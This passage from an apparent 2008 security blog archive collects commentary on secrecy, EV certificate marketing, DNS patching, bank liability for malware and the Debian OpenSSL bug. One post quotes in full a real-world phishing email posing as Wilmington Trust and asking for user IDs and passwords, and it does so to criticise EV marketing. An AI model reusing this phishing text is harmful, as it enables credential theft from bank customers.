      This protocol avoids the endless discussions as to why and whether.

    Well, that's what I have thought about so far. I am sure there is more.

    Posted by iang at 01:24 PM | Comments (0) | TrackBack

    November 20, 2008

    Unwinding secrecy -- busting the covert attack

    Have a read of this. Quick summary: Altimo thinks Telenor may be using espionage tactics to cause problems.

    Altimo alleges the interception of emails and tapping of telephone calls, surveillance of executives and shareholders, and payments to journalists to write damaging articles.

    So instead of getting its knickers in a knot (court case or whatever) Altimo simply writes to Telenor and suggests that this is going on, and asks for confirmation that they know nothing about it, do not endorse it, etc.

    Who ya bluffin?

    ...Andrei Kosogov, Altimo's chairman, wrote an open letter to Telenor's chairman, Harald Norvik, asking him to explain what Telenor's role has been and "what activity your agents have directed at Altimo". He said that he was "reluctant to believe" that Mr Norvik or his colleagues would have sanctioned any of the activities complained of.

    .... Mr Kosogov said he first wrote to Telenor in October asking if the company knew of the alleged campaign, but received no reply. In yesterday's letter to Mr Norvik, Mr Kosogov writes: "We would welcome your reassurance that Telenor's future dealings with Altimo will be conducted within a legal and ethical framework."

    Think about it: This open disclosure locks down Telenor completely. It draws a firm line in time, as also, gives Telenor a face-saving way to back out of any "exuberance" it might have previously "endorsed." If indeed Telenor does not take this chance to stop the activity, it would be negligent. If it is later found out that Telenor's board of directors knew, then it becomes a slam-dunk in court. And, if Telenor is indeed innocent of any action, it engages them in the fight to also chase the perpetrator. The bluff is called, as it were.

    This is good use of game theory. Note also that the Advisory Board of Altimo includes some high-powered people:

    Evidence of an alleged campaign was contained in documents sent to each member of Altimo's advisory board some time before October. The board is chaired by ex-GCHQ director Sir Francis Richards, and includes Lord Hurd, a former UK Foreign Secretary, and Sir Julian Horn-Smith, a founder of Vodafone.

    We could speculate that those players -- the spooks and mandarins -- know how powerful open disclosure is in locking down the options of nefarious players. A salutory lesson!

    Posted by iang at 06:25 PM | Comments (1) | TrackBack

    November 19, 2008

    Unwinding secrecy -- how far?

    One of the things that I've gradually come to believe in is that secrecy in anything is more likely to be a danger to you and yours than a help. The reasons for this are many, but include:

    • hard to get anything done
    • your attacker laughs!
    • ideal cover for laziness, a mess or incompetence

    There are no good reasons for secrecy, only less bad ones. If we accept that proposition, and start unwinding the secrecy so common in organisations today, there appear to be two questions: how far to open up, and how do we do it?

    How far to open up appears to be a personal-organisational issue, and perhaps the easiest thing to do is to look at some examples. I've seen three in recent days which I'd like to share.

    First the Intelligence agencies: in the USA, they are now winding back the concept of "need-to-know" and replacing it with "responsibility-to-share".


    Implementing Intellipedia Within a "Need to Know" Culture

    Sean Dennehy, Chief of Intellipedia Development, Directorate of Intelligence, U.S. Central Intelligence Agency

    Sean will share the technical and cultural changes underway at the CIA involving the adoption of wikis, blogs, and social bookmarking tools. In 2005, Dr. Calvin Andrus published The Wiki and The Blog: Toward a Complex Adaptive Intelligence Community. Three years later, a vibrant and rapidly growing community has transformed how the CIA aggregates, communicates, and organizes intelligence information. These tools are being used to improve information sharing across the U.S. intelligence community by moving information out of traditional channels.

    The way they are doing this is to run a community-wide suite of social network tools: blogs, wikis, youtube-copies, etc. The access is controlled at the session level by the username/password/TLS and at the person level by sponsoring. That latter means that even contractors can be sponsored in to access the tools, and all sorts of people in the field can contribute directly to the collection of information.

    The big problem that this switch has is that not only is intelligence information controlled by "need to know" but also it is controlled in horizontal layers. For same of this discussion, there are three: TOP SECRET / SECRET / UNCLASSIFIED-CONTROLLED. The intel community's solution to this is to have 3 separate networks in parallel, one for each, and to control access to each of these. So in effect, contractors might be easily sponsored into the lowest level, but less likely in the others.

    What happens in practice? The best coverage is found in the network that has the largest number of people, which of course is the lowest, UNCLASSIFIED-CONTROLLED network. So, regardless of the intention, most of the good stuff is found in there, and where higher layer stuff adds value, there are little pointers embedded to how to find it.

    In a nutshell, the result is that anyone who is "in" can see most everything, and modify everything. Anyone who is "out" cannot. Hence, a spectacular success if the mission was to share; it seems so obvious that one wonders why they didn't do it before.

    As it turns out, the second example is quite similar: Google. A couple of chaps from there explained to me around the dinner table that the process is basically this: everyone inside google can talk about any project to any other insider. But, one should not talk about projects to outsiders (presumably there are some exceptions). It seems that SEC (Securities and Exchange Commission in USA) provisions for a public corporation lead to some sensitivity, and rather than try and stop the internal discussion, google chose to make it very simple and draw a boundary at the obvious place.

    The third example is CAcert. In order to deal with various issues, the Board chose to take it totally open last year. This means that all the decisions, all the strategies, all the processes should be published and discussable to all. Some things aren't out there, but they should be; if an exception is needed it must be argued and put into policies.

    The curious thing is why CAcert did not choose to set a boundary at some point, like google and the intelligence agencies. Unlike google, there is no regulator to say "you must not reveal inside info of financial import." Unlike the CIA, CAcert is not engaging in a war with an enemy where the bad guys might be tipped off to some secret mission.

    However, CAcert does have other problems, and it has one problem that tips it in the balance of total disclosure: the presence of valuable and tempting privacy assets. These seem to attract a steady stream of interested parties, and some of these parties are after private gain. I have now counted 4 attempts to do this in my time related to CAcert, and although each had their interesting differences, they each in their own way sought to employ CAcert's natural secrecy to own advantage. From a commercial perspective, this was fairly obvious as the interested parties sought to keep their negotiations confidential, and this allowed them to pursue the sales process and sell the insiders without wiser heads putting a stop to it. To the extent that there are incentives for various agencies to insert different agendas into the inner core, then the CA needs a way to manage that process.

    How to defend against that? Well, one way is to let the enemy of your enemy know who we are talking to. Let's take a benign example which happened (sort of): a USB security stick manufacturer might want to ship extra stuff like CAcert's roots on the stick. Does he want the negotiations to be private because other competitors might deal for equal access, or does he want it private because wiser heads will figure out that he is really after CAcert's customer list? CAcert might care more about one than they other, but they are both threats to someone. As the managers aren't smart enough to see every angle, every time, they need help. One defence is many eyeballs and this is something that CAcert does have available to it. Perhaps if sufficient info of the emerging deal is published, then the rest of the community can figure it out. Perhaps, if the enemy's enemy notices what is going on, he can explain the tactic.

    A more poignant example might be someone seeking to pervert the systems and get some false certificates issued. In order to deal with those, CAcert's evolving Security Manual says all conflicts of interest have to be declared broadly and in advance, so that we can all mull over them and watch for how these might be a problem. This serves up a dilemma to the secret attacker: either keep private and lie, and risk exposure later on, or tell all upfront and lose the element of surprise.

    This method, if adopted, would involve sacrifices. It means that any agency that is looking to impact the systems is encouraged to open up, and this really puts the finger on them: are they trying to help us or themselves? Also, it means that all people in critical roles might have to sacrifice their privacy. This latter sacrifice, if made, is to preserve the privacy of others, and it is the greater for it.

    Posted by iang at 05:16 PM | Comments (0) | TrackBack

    October 19, 2008

    What happened in security over the last 10 years?

    I keep having the same discussion in various places, and keep coming back to this eloquent description of where we are:

    Gunnar's full blog post is here ... it includes some other things, but nothing quite so poignant.

    Web Security hasn't moved since 1995. Oh well.

    Posted by iang at 09:19 PM | Comments (3) | TrackBack

    October 06, 2008

    Browser Security UI: the horns of the dilemma

    One of the dilemmas that the browser security UI people have is that they have to deal with two different groups at the same time. One is the people who can work with the browser and the other is those who blindly click when told to. The security system known as secure browsing seems to be designed for both groups at the same time, thus leading to bad results. For example, Dan Kaminsky counted another scalp when finding back in April that ISPs are doing MITMs on their customers:

    The rub comes when a user is asking for a nonexistent subdomain of a real website, such as http://webmale.google.com, where the subdomain webmale doesn't exist (unlike, say, mail in mail.google.com). In this case, the Earthlink/Barefruit ads appear in the browser, while the title bar suggests that it's the official Google site.

    As a result, all those subdomains are only as secure as Barefruit's servers, which turned out to be not very secure at all. Barefruit neglected basic web programming techniques, making its servers vulnerable to a malicious JavaScript attack. That meant hackers could have crafted special links to unused subdomains of legitimate websites that, when visited, would serve any content the attacker wanted.

    The hacker could, for example, send spam e-mails to Earthlink subscribers with a link to a webpage on money.paypal.com. Visiting that link would take the victim to the hacker's site, and it would look as though they were on a real PayPal page.

    That's a subtle attack, one which the techies can understand but the ordinary users cannot. Here's a simpler one (hat-tip to Duane), a straight phish:

    Dear Wilmington Trust Banking Member,

    Due to the high number of fraud attempts and phishing scams, it has been decided to implement EV SSL Certification on this Internet Banking website.

    The use of EV SSL certification works with high security Web browsers to clearly identify whether the site belongs to the company or is another site imitating that company’s site.

    It has been introduced to protect our clients against phishing and other online fraudulent activities. Since most Internet related crimes rely on false identity, WTDirect went through a rigorous validation process that meets the Extended Validation guidelines.

    Please Update your account to the new EV SSL certification by Clicking here.

    Please enter your User ID and Password and then click Go.

    (Failure to verify account details correctly will lead to account suspension)

    This is a phish email seen in the wild. We here -- the techies -- all know what's wrong with this attack, but can you explain it to your grandma? What is being attacked here here is the brand of EV rather than the technology. In effect, the more ads that relate EV to security in a simplistic fashion, the better this attack works.

    To evade this, the banks have to promote better practices amongst their clients, and they have to include the user into the protocol. But they are not being helped, it seems.

    On the one hand, a commonly held belief with the security developers is that the user cannot be bothered with security, ignore any attempts, and therefore it is best to not bother them with it. Much as I like the mantra of "there is only one mode, and it is secure," it isn't going to work in the web case unless we do the impossible: drop HTTP and make HTTPS mandatory, solve the browser universality issue (note chrome's efforts), and unify the security models end-to-end. As the group of Internet people who can follow that is vanishingly small, this is a non-starter.

    On the other not-so-helpful hand, the pushers of certificates often find themselves caught between the horns of pushing more product (at a higher price) and providing the basic needs of the customers. I recently came across two cases at both extremes of the market: at the unpaid end of the market, the ability of a company to conveniently populate 50,000 desktops is, it is claimed, more important than meeting expectations about verification of contents. The problem with this approach is if people see strong expectations on one side, and casual promises on another equivalent side, the entire brand suffers.

    And, at the expensive EV extreme of the market, the desire to sell a product can sometimes lead to exaggerated claims, as seen in a recent advertisement, seen above (hat-tip to Philipp). This advert in the German paper press includes perhaps over-broad or over-high claims. Translating from German to English as:

    The latest and best in terms of online security. And also the greens.

    Visible security for your site from a company where your customers trust.

    It is quite simple: a green address bar means that your site is secure.

    These claims are easy to make, and they may help sell certs. But they also help the above phishing attack, as they clearly make simple connections between security and EV.

    "EV means security, gotta get me some of that! Click!" FTR, check the translator.

    What would be somewhat more productive than sweeping marketing claims is to decide what it is that the green thing really meant.

    I have heard one easy answer: EV means whatever the CA/Browser Forum Guidelines says it means. OK, but not so fast: I do not recall that it said anywhere that your site has to be secure! I admit to not having read it for a while, but the above advert seems entirely at odds with a certificate claim.

    Further, because that document is long and involved, something clearer and shorter would be useful if there are any pretensions in saying anything to customers.

    If you don't want to say anything to customers, then the Guidelines are fine. But then, what is the point of certs?

    The above is just about EV, but that's just a foil for the wider problem: no CA makes this easy, as yet. I believe it to be an important task for certificate authorities to come up with a simple claim that they can make to users. Something clear, something a user can take to court.

    Indeed, it would be good for all CAs and all browsers to have their claims clearly presented to users, as the users are being told that there is a benefit. To them. Frequently, for years and years now. And now they are at risk, both of losing that benefit and because of that benefit.

    What is that benefit? Can you show it? Can you state it? Can you present it to your grandma? And, will you stand behind her, in court, and explain it to the judge?

    Posted by iang at 05:27 AM | Comments (2) | TrackBack

    September 20, 2008

    Builders v. Breakers

    Gunnar lauds a post on why there are few architects in the security world:

    Superb post by Mark on what I think is the biggest problem we have in security. One thing you learn in consulting is that no matter what anyone tells you when you start a project about what problem you are trying to solve, it is always a people problem. The single biggest problem in security is too many breakers not enough builders. Please understand I am not saying that breakers are not useful, we need them, and we need them to continue to get better so we can build more resilient systems. But the industry is about 90% breaking and 10% building and that's plain bad.

    It’s still predominantly made up of an army of skilled hackers focused on better ways to break systems apart and find new ways to exploit vulnerabilities than “security architects” who are designing secure components, protocols and ultimately secure systems.

    Hear hear! And why is this? One easy answer: breaking something is a solid metric. It's either broken or not, in general. Any journo can understand it.

    On the other hand, building it is too difficult a signal. There is no easy number, there is no binary result. It takes a business focus over decades to understand that one architecture delivers more profits for users and corporates alike than another, and by then, the architects have moved on, so even, then the result may not be clear.

    Let's take an old example. Back around 1996, a couple of bored uni students cracked Netscape's secure browsing. The first time was by crunching the 40 bit crypto using the idle lab computers, and the second time was by predicting the less-than-random numbers injected into the protocol. These students were lauded in the press for having done something grand.

    They then went on to a much harder task, and were almost never heard of again. What was that harder task? Building secure and usable systems. One of them tried to build a secure communications platform, another is trying to build a secure computing platform. So far, they have not succeeded at either task, but these are much harder tasks.

    The true heroes back in the mid-1990s were the Netscape engineers who got something going and delivered it to the public, not the kids who scratched the paint off it. The breaches mentioned above were jokes, and bad ones at that, because they distracted attention on what was really being built. Case in point, is that, even today, if we had twice as much 40 bit crypto as we do 128 bit crypto, we'd probably be twice as secure, because the attack of relevance simply isn't the bored uni student, it is the patient phisher.

    If you recall names in this story, recall them for what they tried to build, and not for what they broke.

    Posted by iang at 05:59 AM | Comments (8) | TrackBack

    September 18, 2008

    Macs for security (now, with new improved NSA hardening tips!)

    Frequent browsers will recall that the top tip number 1 for every user out there is to buy a Mac. That's for several reasons:

    • the security engineering is solid, based on a long history of around 15 years of security programming tradition in Unix
    • Apple have also maintained a security tradition, from well before OSX
    • it remains a "smaller market share" so benefits from the monoculture bounty

    Now there is another reason: hardening tips from the NSA (or here with disclaimers).

    Well, this isn't exactly a reason but more a bonus (likely there is a hardening tips for other popular operating systems as well). However, it is a useful resource for those people who really want more than a standard user install, without the compromises!

    (Note, many of the hardening tips are beyond normal users, so seek experienced advice before following them slavishly.)

    Posted by iang at 12:11 PM | Comments (2) | TrackBack

    September 03, 2008

    Yet more evidence: your CISO needs an MBA

    I have in the past presented the strawman that your CISO needs an MBA. Nobody has yet succeeded in knocking it down, and it is proving surprisingly resilient. Yet more evidence comes from Bruce Schneier's blog post of yesterday:

    Return on investment, or ROI, is a big deal in business. Any business venture needs to demonstrate a positive return on investment, and a good one at that, in order to be viable.

    It's become a big deal in IT security, too. Many corporate customers are demanding ROI models to demonstrate that a particular security investment pays off. And in response, vendors are providing ROI models that demonstrate how their particular security solution provides the best return on investment.

    It's a good idea in theory, but it's mostly bunk in practice.

    Bunk is wrong. Let's drill down. It works this way: NPV (net present value) and ROI (its lesser cousin) are a mathematical tool for choosing between alternate projects. Keep the notion of comparison tightly in your mind.

    The tools measure the money going in versus the money going out in a neutral way. They are entirely neutral between projects because NPV is just mathematics, and the same mathematics is used for each project. (See the top part of Richard's post.)

    Obviously, any result from the model depends totally on the inputs, so there is a great deal of care and theory needed supply those proper inputs. And, it is here that security projects have the trouble, in that we don't have a good view as to how to predict attack costs. To be clear, there is no controversy about the inputs being a big problem.

    But, assuming we have the theory, the process and the inputs, we can, again in principle, measure fairly across all projects.

    That's how it works. As you can see above, we do not make a distinction between investment, savings, costs, returns or profits. Why not? Because NPV model and the numbers don't, either.

    What then goes wrong with security people when they say ROI doesn't apply to security?

    Before I get into the details, there's one point I have to make. "ROI" as used in a security context is inaccurate. Security is not an investment that provides a return, like a new factory or a financial instrument. It's an expense that, hopefully, pays for itself in cost savings. Security is about loss prevention, not about earnings. The term just doesn't make sense in this context.

    Or, or here:

    The bottom line is that security saves money; it does not create money.

    It seems to be that they seize on the words investment and returns, etc, and realise that the words differ from costs and savings. In conceptual or balance sheet terms, they do differ, but here's the catch: to the models of NPV and ROI, it's all the same. In this sense, we could say that the title of ROI is a misnomer, or that there are several meanings to the word "investment" and you've seized on the wrong one.

    If you are good at maths, consider it as simply a model that deals equally well with negative numbers as well as positive numbers. To a model, savings are just negatives of returns.

    Now, if your security director had an MBA, she would know that the purpose of NPV is to compare projects, and not anything else, like generating returns. She would also know that the model is neutral, and that the ability to handle negative numbers mean that expenses and savings can be compared as well. She would further know that the problems occur in the inputs and assumptions, not in the model.

    Finally, she would know how to speak in the language of finance, which is the language that the finance people use. This might sound obvious, but it isn't so clear. As a generalism, it is this last point that is probably most significant about the MBA concept: it teaches you the language of all the other specialities. It doesn't necessarily make you a whizz at finance, or human resources, or marketing. But it at least lets you talk to them in their language. And, it reminds you that the other professions do have some credibility, so if they say something, listen first before teaching them how to suck eggs.

    Posted by iang at 10:09 AM | Comments (2) | TrackBack

    August 25, 2008

    Should a security professional have a legal background?

    Graeme points to this entry that posits that security people need a legal background:

    My own experience and talking to colleagues has prompted me to wonder whether the day has arrived that security professionals will need a legal background. The information security management professional is under increasing pressure to cope with the demands of the organization for access to information, to manage the expectations of the data owner on how and where the information is going to be processed and to adhere to regulatory and legal requirements for the data protection and archiving. In 2008, a number of rogue trader and tax evasion cases in the financial sector have heightened this pressure to manage data.

    The short, sharp answer is no, but it is a little more nuanced than that. First, let's take the rogue trader issue, being someone who has breached the separation of roles within a trading company, and used it to bad effect. To spot and understand this requires two things: an understanding of how settlement works, and the principle of dual control. It does not require the law, at all. Indeed, the legal position of someone who has breached the separation, and has "followed instructions to make a lot of money" is a very difficult subject. Suffice to say, studying the law here will not help.

    Secondly, asking security people to study law so as to deal with tax evasion is equally fruitless but for different reasons: it is simply too hard to understand, it is less law than an everlasting pitched battle between the opposing camps.

    Another way of looking at this is to look at the FC7 thesis, which says that, in order to be an architect in financial cryptography, you need to be comfortable with cryptography, software engineering, rights, accounting, governance, value and finance. The point is not whether law is in there or not, but that there are an awful lot of important things that architects or security directors need before they need law.

    Still, an understanding of the law is no bad thing. I've found several circumstances where it has been very useful to me and people I know:

    • Contract law underpins the Ricardian contract.
    • Dispute resolution underpins the arbitration systems used in sensitive communities (such as WebMoney and CAcert).
    • The ICANN dispute system might have an experienced and realises that touching domains registries can do grave harm. In the alternate, a jurist looking at the system will not come to that conclusion at all.

    In this case, the law knowledge helps a lot. Another area which is becoming more and more an issue is that of electronic evidence. As most evidence is now entering the digital domain (80% was a recent unreferenced claim) there is much to understand here, and much that one can do to save ones company. The problem with this, as lamented at the recent conference, is that any formal course of law includes nothing on electronic evidence. For that, you have to turn to books like those by Stephen Mason on Electronic Evidence. But that you can do yourself.

    Posted by iang at 03:38 PM | Comments (3) | TrackBack

    July 11, 2008

    wheretofore Vista? Microsoft moves to deal with the end of the Windows franchise

    Since the famous Bill Gates Memo, around the same time as phishing and related frauds went institutional, Microsoft has switched around to deal with the devil within: security. In so doing, it has done what others should have done, and done it well. However, there was always going to be a problem with turning the super-tanker called Windows into a battleship.

    I predicted a while back that (a) Vista would probably fail to make a difference, and (b) the next step was to start thinking of a new operating system. This wasn't the normal pique, but the cold-hearted analysis of the size of the task. If you work for 20 years making your OS easy but insecure, you don't have much chance of fixing that, even with the resources of Microsoft.

    The Economist brings an update on both points. Firstly, on Vista's record after 18 months in the market:

    To date, some 140m copies of Vista have been shipped compared with the 750m or more copies of XP in daily use. But the bulk of the Vista sales have been OEM copies that came pre-installed on computers when they were bought. Anyone wanting a PC without Vista had to order it specially.

    Meanwhile, few corporate customers have bought upgrade licences they would need to convert their existing PCs to Vista. Overwhelmingly, Windows users have stuck with XP.

    Even Microsoft now seems to accept that Vista is never going to be a blockbuster like XP, and is hurrying out a slimmed-down tweak of Vista known internally as Windows 7. This Vista lite is now expected late next year instead of 2010 or 2011.

    It's not as though Vista is a dud. Compared with XP, its kernel—the core component that handles all the communication between the memory, processor and input and output devices—is far better protected from malware and misuse. And, in principle, Vista has better tools for networking. All told, its design is a definite improvement—albeit an incremental one—over XP.

    Microsoft tried and failed to turn it around, security+market-wise. We might now be looking at the end of the franchise known as Windows. To be clear, while we are past the peak, any ending is a long way off in the distant future.

    Classical strategy thinking says that there are two possible paths here: invest in a new franchise, or go "cash-cow". The latter means that you squeeze the revenues from the old franchise as long as possible, and delay the termination of the franchise as long as possible. The longer you delay the end, the more revenues you get. The reason for doing this is simple: there is no investment strategy that makes money, so you should return the money to the shareholders. There is a simple example here: the music majors are decidedly in cash-cow, today, because they have no better strategy than delaying their death by a thousand file-shares.

    Certainly, with Bill Gates easing out, it would be possible to go cash-cow, but of course, we on the outside can only cast our augeries and wonder at the signs. The Economist suggests that they may have taken the investment route:

    Judging from recent rumours, that's what it is preparing to do. Even though it won't be in Windows 7, Microsoft is happy to talk about “MinWin”—a slimmed down version of the Windows core. It’s even willing to discus its “Singularity” project—a microkernel-based operating system written strictly for research purposes. But ask about a project code-named “Midori” and everyone clams up.

    By all accounts, Midori (Japanese for “green” and, by inference, “go”) capitalises on research done for Singularity. The interesting thing about this hush-hush operating system is that it’s not a research project in the normal sense. It's been moved out of the lab and into incubation, and is being managed by some of the most experienced software gurus in the company.

    With only 18 months before Vista is to be replaced, there's no way Midori—which promises nothing less than a total rethink of the whole Windows metaphor—could be ready in time to take its place. But four or five years down the road, Microsoft might just confound its critics and pleasantly surprise the rest of us.

    Comment? Even though I predicted Microsoft would go for a new OS, I think this is a tall order. There are two installed bases in the world today, being Unix and Windows. It's been that way for a long time, and efforts to change those two bases have generally failed. Even Apple gave up and went Unix. (The same economics works against the repeated attempts to upgrade the CPU instruction set.)

    The flip-side of this is that the two bases are incredibly old and out-of-date. Unix's security model is "ok" but decidedly pre-PC, much of what it does is simply irrelevant to the modern world. For example, all the user-to-user protection is pointless on a one-user-one-PC environment, and the major protection barrier has accidentally become a hack known as TCP/IP, legendary for its inelegant grafting onto Unix. Windows has its own issues.

    So we know two things: a redesign is decades over-due. And it won't budge the incumbents; both are likely to live another decade without appreciable change to the markets. We would need a miracle, or better, a killer-app to budge the installed base.

    Hence the cold-hearted analysis of cash-cow wins out.

    But wait! The warm-blooded humanists won't let that happen for one and only one reason: it is simply too boring to contemplate. Microsoft has so many honest, caring, devoted techies within that if a decision were made to go cash-cow, there would be a mass-defection. So the question then arises, what sort of a hybrid will be acceptable to shareholders and workers? Taking a leaf from recent politics, which is going through a peak-energy-masquerade of its own these days, some form of "green platform" has appeal to both sides of the voting electorate.

    Posted by iang at 09:26 AM | Comments (2) | TrackBack

    July 10, 2008

    DNS rebinding attack/patch: the germination of professional security cooperation?

    Lots of chatter is seen in the security places about a patch to DNS coming out. It might be related to Dan's earlier talks, but he also makes a claim that there is something special in this fix. The basic idea is that DNS replies are now on randomised ports (or some such) and this will stop spoofing attempts of some form. You should patch your DNS.

    Many are skeptical, and this gives us an exemplary case study of today's "security" industry:

    Ptacek: If the fix is “randomize your source ports”, we already knew you were vulnerable. Look, DNS has a 16 bit session ID… how big is an ASPSESSIONID or JSESSIONID? When you get to this point you are way past deck chairs on the titanic, but, I mean, the web people already know this. This is why TLS/SSL totally doesn’t care about the DNS. It is secure regardless of the fact that the DNS is owned.

    Paraphrased: "Oh, we knew about that, so what?" As above, much of the chatter in other groups is about how this apparently fixes something that is long known, therefore insert long list of excuses, hand-wringing, slap-downs, and is not important. However, some of the comments are starting to hint at professionalism. Nathan McFeters writes:

    I asked Dan what he thought about Thomas Ptacek’s (Thomas Ptacek of Matasano) comments suggesting that the flaw was blown out of proportion and Dan said that the flaw is very real and very serious and that the details will be out at Black Hat. Dan mentioned to me that he was very pleased with how everything has worked with the multi-vendor disclosure process, as he said, “we got several vendors together and it actually worked”. To be honest, this type of collaboration is long overdue, and there’s a lot of folks in the industry asking for it, and I’m not just talking about the tech companies cooperating, several banking and financial companies have discussed forums for knowledge sharing, and of course eBay has tried to pioneer this with their “eBay Red Team” event. It’s refreshing to here a well respected researcher like Dan feeling very positive about an experience with multiple vendors working together (my own experience has been a lot of finger pointing and monkey business).

    Getting vendors to work together is quite an achievement. Getting them to work on security at the same time, instead of selling another silver bullet, is extraordinary, and Dan should write a book on that little trick:

    Toward addressing the flaw, Kaminsky said the researchers decided to conduct a synchronized, multivendor release and as part of that, Microsoft in its July Patch Tuesday released MS08-037. Cisco, Sun, and Bind are also expected to roll out patches later on Tuesday.

    As part of the coordinated release, Art Manion of CERT said vendors with DNS servers have been contacted, and there’s a longer list of additional vendors that have DNS clients. That list includes AT&T, Akamai, Juniper Networks, Inc., Netgear, Nortel, and ZyXEL. Not all of the DNS client vendors have announced patches or updates. Manion also confirmed that other nations with CERTs have also been informed of this vulnerability.

    Still, for the most part, the industry remains fully focussed on the enemy within, as exemplified by Ptacek's comment above. I remain convinced that the average "expert" wouldn't recognise a security fix until he's been firmly wacked over the head by it. Perhaps that is what Ptacek was thinking when he allegedly said:

    If the IETF would just find a way to embrace TLS/X509 instead griping about how Verisign is out to get us we wouldn’t have this problem. Instead, DNSSEC tried to reinvent TLS by committee… well, surprise surprise, in 2008, we still care about 16 bit session IDs! Go Internet!

    Now, I admit to being a long-time supporter of TLS'ing everything (remember, there is only one mode, and it is secure!) but ... just ... Wow! I think this is what psychologists call the battered-wife syndrome; once we've been beaten black and blue with x.509 for long enough, maybe we start thinking that the way to quieten our oppressor down is to let him beat us some more. Yeah, honey, slap me with some more of that x.509 certificate love! Harder, honey, harder, you know I deserve it!

    Back to reality, and to underscore that there is something non-obvious about this DNS attack that remains unspoken (have you patched yet?), the above-mentioned commentator switched around 540 degrees and said:

    Patch Your (non-DJBDNS) Server Now. Dan Was Right. I Was Wrong.

    Thanks to Rich Mogull, Dino and I just got off the phone with Dan Kaminsky. We know what he’s going to say at Black Hat.

    What can we say right now?

    1. Dan’s got the goods. ...

    Redeemed! And, to be absolutely clear as to why this blog lays in with slap after slap, being able to admit a mistake should be the first criteria for any security guy. This puts Thomas way ahead of the rest of them.

    Can't say it more clearly than that: have you patched your DNS server yet?

    Posted by iang at 09:30 AM | Comments (4) | TrackBack

    July 06, 2008

    German court finds Bank responsible for malwared PC

    Spiegel reports that a German lower court ("Amtsgerichts Wiesloch (Az4C57/08)") has found a bank responsible for malware-driven transactions on a user's PC. In this case, her PC was infected with some form of malware that grabbed the password and presumably a fresh TAN (German one-time number to authenticate a single transaction) and scarfed 4000 euros through an eBay wash.

    Unfortunately only in German, and so analysis following is highly limited and unreliable. It appears that the court's logic was that as the transaction was not authenticated by the user, it is the bank's problem.

    This seems fairly simple, except that Microsoft Windows-based PCs are difficult to keep clean of malware. In this case, the user had a basic anti-virus program, but that's not enough these days (see top tips on what helps).

    We in the security field all knew that, and customers are also increasingly becoming aware of it, but the question the banking and security world is asking itself is whether, why and when the bank is responsible for the user's insecure PC? Shouldn't the user take some of the risk for using an insecure platform?

    The answer is no. The risk belongs totally to the bank in this case, in the opinion of the Wiesloch court, and the court of financial cryptography agrees. Consider the old legal principle of putting the responsibility with the party best able to manage it. In this case, the user cannot manage it, manifestly. Further, the security industry knew that the Windows PC was not secure enough for risky transactions, and that Microsoft software was the dominant platform. The banking industry has had this advice in tanker-loads (c.f. EU "Finread"), and in many cases banks have even heeded the advice, only to discard it later. The banking industry decided to go ahead in the face of this advice and deploy online banking for support cost motives. The banks took on this risk, knowing the risk, and knowing that the customer could not manage this risk.

    Therefore, the liability falls completely to the bank in the basic circumstances described. In this blog's opinion ! (It might have been different if the user had done something wrong such as participate in a mule wash or had carried on in the face of clear evidence of infection.)

    There is some suggestion that the judgment might become a precedent, or not. We shall have to wait and see, but one thing is clear, online banking has a rocky road ahead of it, as the phishing rooster comes home to roost. For contrary example, another case in Cologne (Az: 9S195/07) mentioned in the article put the responsibility for EC-card abuse with the customer. As we know, smart cards can't speak to the user about what they are doing, so again we have to ask what the Windows PC was saying about the smart card's activities. If the courts hold the line that the user is responsible for her EC-card, then this can only cause the user to mistrust her EC-card, potentially leading to yet another failure of an expensive digital signing system.

    The costs for online banking are going to rise. A part of any solution, as frequently described by security experts, is to not trust widely deployed Microsoft Windows PCs for online banking, which in effect means PCs in general. A form of protection is fielded in some banks whereby the user's mobile phone is used to authenticate the real transaction over another channel. This is mostly cheap and mostly effective, but it isn't a comprehensive or permanent solution.

    Posted by iang at 08:28 AM | Comments (3) | TrackBack

    June 22, 2008

    H4.2 -- Usability Determines the Number of Users

    Last week's discussion (here and here) over how there is only one mode, and it is secure, brought forth the delicious contrast with browsing and security: yes, you can do that but it doesn't work well. No, I'm not talking about the logos being cross-sited, but all of the 100 little flaws that you find when you try and do a website for secure purposes.

    So why bother? Financial cryptography eats its own medicine, but it doesn't do it for breakfast, lunch and desert. Which reminds me to introduce another of the sub-hypes for critique:

    #4.2 Usability Determines the Number of Users

    Ease of use is the most important determinant to the number of users. Ease of implementation is important, ease of incorporation is also important, and even more important is the ease of use by end-users. This reflects a natural subdivision into several classes of users: implementors, integrators and end-users, each class of which can halt the use of the protocol if they find it ... unusable. As they are laid out serially between you and the marketplace, you have to consider usability to all of them.

    The protocol should be designed to be easy to code up, so as to help implementors help integrators help users. It should be designed to be easy to interface to, so as to help integrators help users. It should be designed to be easy to configure, so as to help users get security.

    If there are any complex or tricky features, ask yourself whether the benefit is really worth the cost of coder's time. It is not that developers cannot do it, it is simply that they will not do it; nobody has all the time in the world, and a protocol that is twice as long to implement is twice as likely to not get done.

    Same for integrators of systems. If the complexity provided by the protocol and the implementation causes X amount of work, and another protocol costs only X/2 then there is a big temptation to switch. Regardless of absolute or theoretical security.

    Same for users.

    Posted by iang at 08:13 AM | Comments (3) | TrackBack

    June 06, 2008

    The Dutch show us how to make money: Peace and Cash Foundation

    Sometime around 3 years back, banks started to respond to phishing efforts by putting in checks and controls to stop people sending money. This led to the emergence of a new business model that promised great returns on investment by arbitraging the controls, and has led to the enrichment of many! Now, my friends in NL have alerted me to the NVB's efforts to sell the Dutch on the possibilities.

    Welcome to the Peace and Cash Foundation!

    A fun few minutes, and even though it is in Dutch, the symbology should be understood. Does anyone have an English translation?

    (Okay, you might not see the Peace and Cash Foundation by the time you click on the site, but another generation will be there to help you to well-deserved riches...)

    Posted by iang at 01:00 PM | Comments (2) | TrackBack

    May 14, 2008

    Case study in risk management: Debian's patch to OpenSSL

    Ben Laurie blogs that downstream vendors like Debian shouldn't interfere with sensitive code like OpenSSL. Because they might get it wrong... And, in this case they did, and now all Debian + Ubuntu distros have 2-3 years of compromised keys. 1, 2.

    Further analysis shows however that the failings are multiple, are at several levels, and they are shared all around. As we identified in 'silver bullets' that fingerpointing is part of the problem, not the solution, so let's work the problem, as professionals, and avoid the blame game.

    First the tech problem. OpenSSL has a trick in it that mixed in uninitialised memory with the randomness generated by the OS's formal generator. The standard idea here being that it is good practice to mix in different sources of randomness into your own source. Roughly following the designs from Schneier and Ferguson (Yarrow and Fortuna), modern operating systems take several random things like disk drive activity and net activity and mix the measurements into one pool, then run it through a fast hash to filter it.

